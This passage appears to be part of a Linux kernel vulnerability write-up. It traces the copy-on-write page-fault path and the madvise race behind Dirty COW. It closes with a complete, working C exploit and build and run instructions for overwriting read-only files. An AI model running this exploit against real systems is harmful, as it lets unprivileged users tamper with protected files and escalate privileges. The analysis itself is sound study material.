if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
ret = handle_mm_fault(mm, vma, address, fault_flags); // handle the page fault
if (ret & VM_FAULT_ERROR) {
if (ret & VM_FAULT_OOM)
return -ENOMEM;
if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
return -EFAULT;
BUG();
}
if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}
if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}
/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) // the second fault takes this branch and clears the FOLL_WRITE flag
*flags &= ~FOLL_WRITE;
return 0;
}
The first page fault
The first time follow_page_mask is called, the page tables and the pte are empty, so it returns NULL, and we enter faultin_page to handle the fault. That eventually calls do_cow_fault, which returns 0, so follow_page_mask is executed again.
The second page fault
Since we have no write permission for the page, follow_page_mask still returns NULL, another fault is taken, and we enter faultin_page again. This time the write fault is resolved successfully (a usable page is now in place), and faultin_page clears the FOLL_WRITE bit in foll_flags.
The flow then returns to the retry label of __get_user_pages for a third attempt to fetch the page. Since the FOLL_WRITE bit in foll_flags has been cleared, the kernel treats the request as a read, so follow_page_mask successfully returns the page; the ordinary write path follows, and the COW is complete.
Vulnerability analysis
When writing /proc/self/mem as described above, the overall flow is roughly:
/*
mem_rw
__get_free_page
......
__access_remote_vm
......
__get_user_pages
follow_page_mask ==> fetch the memory page
faultin_page ==> handle the page fault
handle_mm_fault ==> this is the page fault handling path analysed above
*/
The first time follow_page_mask is called, the page tables and the pte are empty, so it returns NULL and we enter faultin_page to handle the fault. That ends up in do_cow_fault, which returns 0, so follow_page_mask is executed again.
The second time follow_page_mask is called, the page table mapping, the pte and so on have already been filled in (see the do_cow_fault analysis above). But the page table entry is read-only while we want to write, so NULL is returned again and we enter faultin_page once more. This time we end up in do_wp_page, which reuses the page allocated by do_cow_fault, and the FOLL_WRITE bit in foll_flags is cleared.
The third time follow_page_mask is called, FOLL_WRITE has already been cleared, so the request is effectively a read and the page is fetched. The user's write therefore goes into this private copy and is never synced back to the disk file.
But if, between the second and the third call, another thread uses madvise(addr, len, MADV_DONTNEED) to tell the kernel the page is no longer needed, then on the third attempt we go through follow_page_mask->faultin_page->follow_page_mask again, and this time the page cache page itself is returned.
The normal call flow looks roughly like this:
/*
follow_page_mask() // the page is not mapped yet, handle it with faultin_page
👇
faultin_page() // ends up in do_cow_fault, i.e. an anonymous page is created (nothing has been written yet)
👇
follow_page_mask() // the access flags still carry FOLL_WRITE but the anonymous page is read-only; permission mismatch, handle it with faultin_page
👇
faultin_page() // ends up in do_wp_page, which reuses the anonymous page above and removes FOLL_WRITE from flags
👇
follow_page_mask() // with FOLL_WRITE gone the permission check passes and the anonymous page is returned
👇
back in the caller 👉 kmap and write the data; the write targets the anonymous page, so the data in the page cache is unaffected
*/
dirtycow
The Dirty COW call flow:
/*
follow_page_mask() // the page is not mapped yet, handle it with faultin_page
👇
faultin_page() // ends up in do_cow_fault, i.e. an anonymous page is created (nothing has been written yet)
👇
follow_page_mask() // the access flags still carry FOLL_WRITE but the anonymous page is read-only; permission mismatch, handle it with faultin_page
👇
faultin_page() // ends up in do_wp_page, which reuses the anonymous page above and removes FOLL_WRITE from flags
👇👉👉👉👉👉 // race: madvise tells the kernel the anonymous page is no longer needed, so its pte etc. are torn down
follow_page_mask() // the page is therefore seen as unmapped again and faultin_page is called, but flags no longer carry FOLL_WRITE
👇
faultin_page() // without FOLL_WRITE this counts as a read, so the page cache page is mapped in directly
👇
follow_page_mask() // the page cache page is returned
👇
back in the caller 👉 kmap and write the data; this now writes straight into the page cache, so the file contents on disk end up modified
*/
Exploitation
This vulnerability is quite old and seems to be patched everywhere; I tried several kernel versions without success, so I will just record an exploit here.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
void* map;
void usage()
{
puts("usage: ./exp dest_file dirty_data");
exit(-1);
}
void* write_func(void* args)
{
int fd = open("/proc/self/mem", O_RDWR);
for (int i = 0; i < 0x100000; i++)
{
lseek(fd, (off_t)map, SEEK_SET);
write(fd, args, strlen(args));
}
return NULL;
}
void* madvise_func(void* args)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(map, 0x100, MADV_DONTNEED);
}
return NULL;
}
int main(int argc, char** argv, char** env)
{
if (argc < 3) usage();
pthread_t write_thr, madvise_thr;
struct stat dest_st;
int dest_fd;
dest_fd = open(argv[1], O_RDONLY);
fstat(dest_fd, &dest_st);
map = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);
pthread_create(&madvise_thr, NULL, madvise_func, NULL);
pthread_create(&write_thr, NULL, write_func, argv[2]);
pthread_join(write_thr, NULL);
pthread_join(madvise_thr, NULL);
return 0;
}
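If you still want to try it, the program should build with something like gcc exp.c -o exp -pthread and be run as ./exp <dest_file> <dirty_data> against a file the current user can read but not write (the file name exp.c and the exact command line are my assumptions; adjust as needed). On a vulnerable kernel the target file's contents end up modified despite the read-only permission.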